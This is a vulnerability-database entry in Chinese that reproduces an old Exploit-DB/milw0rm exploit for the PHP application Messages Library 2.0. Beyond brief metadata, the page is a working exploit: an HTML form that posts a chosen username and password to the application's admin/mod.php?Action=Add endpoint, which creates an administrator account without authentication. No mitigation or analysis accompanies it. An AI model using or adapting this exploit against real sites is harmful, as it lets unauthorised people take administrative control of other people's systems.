Messages Library 2.0 - Arbitrary Administrator Account

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057952 漏洞类型
发布时间 2009-06-30 更新时间 2009-06-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/9059
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<head>
<title>ThE g0bL!N  Messages Library 2.0 Remote Add Admintsrator Account </title>
<base target="left">
<link rel="stylesheet" href="style.css">
</head>
<form method="POST" action="http://path/sms/admin/mod.php?Action=Add">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
    <tr>
      <td width="25%"><font face="MS Sans Serif" size="2">Username</font></td>
      <td width="75%"> <input type="text" name="Name" size="57"></td>
    </tr>
    <tr>
      <td width="25%"><font face="MS Sans Serif" size="2">Password</font></td>
      <td width="75%"> <input type="password" name="Password" size="57"></td>
    </tr>
  </table>
  <p align="center"><input type="submit" value="add admin" name="B1"></p>
</form>
</body>
</html>

# milw0rm.com [2009-06-30]